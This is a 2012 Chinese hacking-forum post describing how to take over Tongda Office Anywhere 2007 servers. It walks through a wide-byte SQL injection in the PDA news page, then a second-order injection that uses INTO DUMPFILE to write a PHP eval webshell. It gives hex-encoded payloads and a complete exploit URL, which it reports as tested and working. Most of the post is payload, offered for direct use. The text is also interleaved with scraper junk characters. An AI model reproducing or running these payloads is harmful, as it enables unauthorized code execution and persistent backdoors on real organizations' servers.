找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2553|回复: 0
打印 上一主题 下一主题

通达OA2007版本漏洞及getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-20 08:09:24 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
目前测试通达OA2007版本
- O8 K+ a) o6 ^3 U" Z5 T  }+ l7 I7 Z. B3 c) f; v' D9 i% z

% `: S- q" f' ]3 sOffice Anywhere 2007 网络智能办公系统
9 R! _) R* ]# l3 e
& O4 z" S2 O: Z7 Z( ohttp://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..
. M+ s7 p% k7 t. j
6 g; y( T* I+ E& F0 J4 N. J
7 S7 H. f4 X" `& I, l5 w  v) z这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的2 S3 {& C( |$ d) W
0 d! q" Z1 f! c" E
例如:SELECT * from USER where USER_ID='{$USERNAME}'  
, C3 C+ r4 L8 ^其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了
- d' z0 v$ o9 Q* v+ Y. z; }
7 `) W2 `  o% E' y( j% b这个时候我们是不是可以组合起来使用哪?
0 s2 b3 D% L2 a
9 |, c1 o- x; p2 u+ r第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样* j9 R; u# ?" i9 n8 {% b+ W
union select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10
. M, v* O4 t" h  \4 i1 c
1 `' _, \* x8 ?: O" S+ b( \" t这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
6 C1 u; e! \, N7 l3 w# D
# V; m! Q, v* y4 \那么问题来了,单引号可以吗?当然是不可以的,^_^。。。- ~. I7 i' L4 V1 A5 Z3 L5 i9 [

' o# }+ s! e- r那么我们用字符串格式带入进行hex编码  l9 F& v9 u8 e3 P" F
/ S0 F) M+ V4 Y% n
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
, g- }/ m& ^. m4 _0 I 3 I. K, w/ B# q/ a9 v* f5 t; b: W2 A  U
测试ok,获取oa的webshell
) w+ D* j5 |  y# p1 w( [) o% o 1 o* Y: {9 n! r$ E$ X1 k- R0 Q

6 ^) J! ]8 x6 o# ~8 R7 C2 l: `: Epda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23. a" J. O$ E; G! |
直接getwebshell
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表